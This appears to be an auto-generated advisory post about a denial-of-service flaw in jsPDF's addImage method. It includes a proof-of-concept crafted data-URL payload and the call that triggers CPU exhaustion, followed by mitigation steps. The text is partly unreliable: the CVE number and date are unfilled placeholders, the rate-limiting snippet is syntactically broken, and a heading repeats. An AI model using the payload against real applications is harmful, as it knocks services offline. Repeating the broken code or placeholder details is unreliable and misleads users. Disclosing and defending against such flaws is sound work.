jsPDF, Denial of Service (DoS), CVE-2023-XXXX (Critical)

By /

How the CVE Works:

The vulnerability in jsPDF arises due to insufficient validation of user-supplied input in the `addImage` method. When an attacker provides a maliciously crafted data URL as the first argument to addImage, it triggers excessive CPU utilization, leading to a denial of service (DoS). The payload exploits the library’s inability to properly handle large or malformed data URLs, causing the application to hang or crash. Other affected methods include `html` and addSvgAsImage, which similarly fail to sanitize input, making them susceptible to the same attack vector. The example payload demonstrates how a crafted data URL can be used to exploit this vulnerability, causing significant performance degradation.

DailyCVE Form:

Platform: jsPDF
Version: <3.0.1
Vulnerability: DoS via CPU exhaustion
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploitation:

  1. Craft Malicious Payload: Create a data URL with excessive or malformed content. 
    const payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\x00base64,undefined';

2. Trigger Vulnerability: Pass the payload to `addImage`.

const doc = new jsPDF();
doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");

3. Observe CPU Spike: Monitor CPU usage to confirm exploitation.

Protection:

  1. Upgrade jsPDF: Ensure the library is updated to version 3.0.1 or later. 
    npm install jspdf@latest
  2. Input Sanitization: Validate and sanitize all user-supplied URLs before processing. 
    function sanitizeURL(url) {
if (!url.startsWith('data:image/')) throw new Error('Invalid URL');
return url;
}
  3. Rate Limiting: Implement rate limiting to mitigate DoS attacks. 
    const rateLimit = require('express-rate-limit');
const limiter = rateLimit({ windowMs: 15 60 1000, max: 100 });
app.use(limiter);
  4. Monitoring: Use monitoring tools to detect abnormal CPU usage. 
    top -o %CPU

Analytics:

  • Affected Versions: All versions of jsPDF prior to 3.0.1.
  • Attack Vector: Remote, via crafted data URLs.
  • Impact: High CPU utilization leading to DoS.
  • Mitigation Difficulty: Low (upgrade and sanitize inputs).

References:

References:

Reported By: https://github.com/advisories/GHSA-w532-jxjh-hjhj
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top